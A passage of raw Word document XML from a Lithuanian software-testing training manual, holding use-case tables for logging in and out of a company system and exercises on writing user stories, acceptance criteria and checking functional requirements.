              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Konfliktai:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="963" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="0059750E" w:rsidRPr="00AD4464" w:rsidRDefault="0059750E" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Nėra</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0059750E" w:rsidRPr="00AD4464" w:rsidTr="00EA6F32">
        <w:trPr>
          <w:trHeight w:val="240"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2164" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="0059750E" w:rsidRPr="00AD4464" w:rsidRDefault="0059750E" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Papildoma medžiaga:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7053" w:type="dxa"/>
            <w:gridSpan w:val="5"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="0059750E" w:rsidRPr="00AD4464" w:rsidRDefault="0059750E" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0059750E" w:rsidRPr="00AD4464" w:rsidTr="00EA6F32">
        <w:trPr>
          <w:trHeight w:val="250"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2164" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="0059750E" w:rsidRPr="00AD4464" w:rsidRDefault="0059750E" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Istorija:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6090" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="0059750E" w:rsidRPr="00AD4464" w:rsidRDefault="0059750E" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Užregistruotas 2008m. sausio 15d.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="963" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="0059750E" w:rsidRPr="00AD4464" w:rsidRDefault="0059750E" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003150A8" w:rsidRPr="00AD4464" w:rsidRDefault="003150A8" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="Lentelespavad"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">Panaudojimo atvejis Nr.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3"/>
        <w:gridCol w:w="6343"/>
      </w:tblGrid>
      <w:tr w:rsidR="003150A8" w:rsidRPr="00AD4464" w:rsidTr="00EA6F32">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2943" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="003150A8" w:rsidRPr="00AD4464" w:rsidRDefault="003150A8" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Nr.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6343" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="003150A8" w:rsidRPr="00AD4464" w:rsidRDefault="003150A8" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003150A8" w:rsidRPr="00AD4464" w:rsidTr="00EA6F32">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2943" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="003150A8" w:rsidRPr="00AD4464" w:rsidRDefault="003150A8" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Pavadinimas:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6343" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="003150A8" w:rsidRPr="00AD4464" w:rsidRDefault="003150A8" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Prisijungimas prie sistemos.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003150A8" w:rsidRPr="00AD4464" w:rsidTr="00EA6F32">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2943" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="003150A8" w:rsidRPr="00AD4464" w:rsidRDefault="003150A8" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Vartotojas/aktorius:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6343" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="003150A8" w:rsidRPr="00AD4464" w:rsidRDefault="003150A8" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Bendrovės darbuotojas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003150A8" w:rsidRPr="00AD4464" w:rsidTr="00EA6F32">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2943" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="003150A8" w:rsidRPr="00AD4464" w:rsidRDefault="003150A8" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Aprašas:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6343" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="003150A8" w:rsidRPr="00AD4464" w:rsidRDefault="003150A8" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Apima prisijungimo prie sistemos procesą.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003150A8" w:rsidRPr="00AD4464" w:rsidTr="00EA6F32">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2943" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="003150A8" w:rsidRPr="00AD4464" w:rsidRDefault="003150A8" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Prieš sąlyga:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6343" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="003150A8" w:rsidRPr="00AD4464" w:rsidRDefault="003150A8" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Vartotojas yra registruotas sistemoje ir turi priskirtą slaptažodį.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003150A8" w:rsidRPr="00AD4464" w:rsidTr="00EA6F32">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2943" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="003150A8" w:rsidRPr="00AD4464" w:rsidRDefault="003150A8" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Sužadinimo sąlyga:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6343" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="003150A8" w:rsidRPr="00AD4464" w:rsidRDefault="003150A8" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Slaptažodžio teisingas įvedimas.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003150A8" w:rsidRPr="00AD4464" w:rsidTr="00EA6F32">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2943" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="003150A8" w:rsidRPr="00AD4464" w:rsidRDefault="003150A8" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Po sąlyga:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6343" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="003150A8" w:rsidRPr="00AD4464" w:rsidRDefault="003150A8" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Atidaromas pagrindinis sistemos langas.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00861672" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="003A3B61" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00C72318" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C72318" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">užduotis. </w:t>
      </w:r>
      <w:r w:rsidR="00C72318" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A10615" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>REIKALAVIMŲ PERŽIŪROS PROCESAS</w:t>
      </w:r>
      <w:r w:rsidR="004D5173">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="004D5173" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00135AF0" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Žemiau pateiktą panaudojimo atvejį užra</w:t>
      </w:r>
      <w:r w:rsidR="00861672" w:rsidRPr="00AD4464">
        <w:t>šykite Vartotojo istorijos (var</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>totojo pas</w:t>
      </w:r>
      <w:r w:rsidR="007A2A80" w:rsidRPr="00AD4464">
        <w:t>akojimo) formate</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> bei nustatykite reikalavimo paruošimo kriterijus (“Definition of Ready”) bei užtikrinkite aiškius priėmimo kri</w:t>
      </w:r>
      <w:r w:rsidR="007A2A80" w:rsidRPr="00AD4464">
        <w:t>terijus (“Acceptance criteria”)</w:t>
      </w:r>
      <w:r w:rsidR="004D5173">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="007A2A80" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>UŽDUOTIES TIKSLAS</w:t>
      </w:r>
      <w:r w:rsidR="00FB35E0" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="003A3B61" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Suprasti, kam reikal</w:t>
      </w:r>
      <w:r w:rsidR="002F6329" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">inga reikalavimų peržiūra, kada ji yra vykdoma, </w:t>
      </w:r>
      <w:r w:rsidR="00C94FCC" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>kokie y</w:t>
      </w:r>
      <w:r w:rsidR="003A3B61" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ra peržiūros privalumai ir naud</w:t>
      </w:r>
      <w:r w:rsidR="00C94FCC" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>os komandai.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003150A8" w:rsidRPr="00AD4464" w:rsidRDefault="00734A41" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Panaudojimo atvejis N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3"/>
        <w:gridCol w:w="6265"/>
      </w:tblGrid>
      <w:tr w:rsidR="00734A41" w:rsidRPr="00AD4464" w:rsidTr="00EA6F32">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2943" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00734A41" w:rsidRPr="00AD4464" w:rsidRDefault="00734A41" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Nr.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6265" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00734A41" w:rsidRPr="00AD4464" w:rsidRDefault="00734A41" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00734A41" w:rsidRPr="00AD4464" w:rsidTr="00EA6F32">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2943" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00734A41" w:rsidRPr="00AD4464" w:rsidRDefault="00734A41" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Pavadinimas:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6265" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00734A41" w:rsidRPr="00AD4464" w:rsidRDefault="00734A41" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Išeiti iš sistemos.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00734A41" w:rsidRPr="00AD4464" w:rsidTr="00EA6F32">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2943" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00734A41" w:rsidRPr="00AD4464" w:rsidRDefault="00734A41" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Vartotojas/aktorius:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6265" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00734A41" w:rsidRPr="00AD4464" w:rsidRDefault="00734A41" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Bendrovės darbuotojas.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00734A41" w:rsidRPr="00AD4464" w:rsidTr="00EA6F32">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2943" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00734A41" w:rsidRPr="00AD4464" w:rsidRDefault="00734A41" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Aprašas:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6265" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00734A41" w:rsidRPr="00AD4464" w:rsidRDefault="00734A41" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Apima atsijungimo nuo sistemos ir programos uždarymo procesą.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00734A41" w:rsidRPr="00AD4464" w:rsidTr="00EA6F32">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2943" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00734A41" w:rsidRPr="00AD4464" w:rsidRDefault="00734A41" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Prieš sąlyga:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6265" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00734A41" w:rsidRPr="00AD4464" w:rsidRDefault="00734A41" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Bet kuris darbo etapas sistemoje.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00734A41" w:rsidRPr="00AD4464" w:rsidTr="00EA6F32">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2943" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00734A41" w:rsidRPr="00AD4464" w:rsidRDefault="00734A41" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Sužadinimo sąlyga:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6265" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00734A41" w:rsidRPr="00AD4464" w:rsidRDefault="00734A41" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t xml:space="preserve">Pele sužadinamas mygtukas “Atsijungti”. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00734A41" w:rsidRPr="00AD4464" w:rsidTr="00EA6F32">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2943" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00734A41" w:rsidRPr="00AD4464" w:rsidRDefault="00734A41" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Po sąlyga:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6265" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00734A41" w:rsidRPr="00AD4464" w:rsidRDefault="00734A41" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Programa uždaryta.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="002D59EF" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="135" w:name="_Toc14392443"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Mokymosi rezultatas. </w:t>
      </w:r>
      <w:r w:rsidR="00F55F68" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Naudoti funkcinius, nefunkcinius ir techninius kompiuterinės programos reikalavimus.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="135"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="004112F7" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00A10615" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A10615" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>užduotis.</w:t>
      </w:r>
      <w:r w:rsidR="00A10615" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> FUNKCINIAI REIKALAVIMAI</w:t>
      </w:r>
      <w:r w:rsidR="004D5173">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="004112F7" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:lastRenderedPageBreak/>
        <w:t>Patikrinti, ar veikianti žiniatinklio programa atitinka atitinka žemiau apibrėžtus funkcinius reikalavimus. Pateikti ne</w:t>
      </w:r>
      <w:r w:rsidR="007A2A80" w:rsidRPr="00AD4464">
        <w:t>atitikimų sąrašą, jei tokių yra</w:t>
      </w:r>
      <w:r w:rsidR="004D5173">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="007A2A80" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>UŽDUOTIES TIKSLAS</w:t>
      </w:r>
      <w:r w:rsidR="00AA3299" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00FB54DC" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Išmokti</w:t>
      </w:r>
      <w:r w:rsidR="00194D75" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
